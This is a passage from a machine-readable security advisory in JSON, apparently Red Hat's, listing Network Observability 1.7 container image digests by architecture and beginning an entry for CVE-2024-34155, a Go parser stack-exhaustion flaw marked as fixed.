"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a?arch=ppc64le\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product_id": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080?arch=arm64\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product_id": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product_id": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product": {
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product_id": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle\u0026tag=1.7.0-86"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product": {
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product_id": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134?arch=s390x\u0026repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator\u0026tag=v1.7.0-67"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64"
},
"product_reference": "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-34155",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:06.929766+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310527"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-674: Uncontrolled Recursion vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nInput validation controls ensure that inputs triggering recursion are validated to stay within safe limits which reduces the risk of infinite or excessive recursion. The implementation of least functionality on the platform further restricts potential impacts of recursions by disabling unnecessary recursive functions or features, thus reducing the available pathways for a would-be attacker. The inclusion of developer testing and evaluation ensures that recursive functions are tested and that safeguards like error handling are in place. In the case of successful exploitation, detection and containment controls are in place to limit impacts by alerting on anomalous system behavior in real time while process isolation can limit impacts to a single process.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
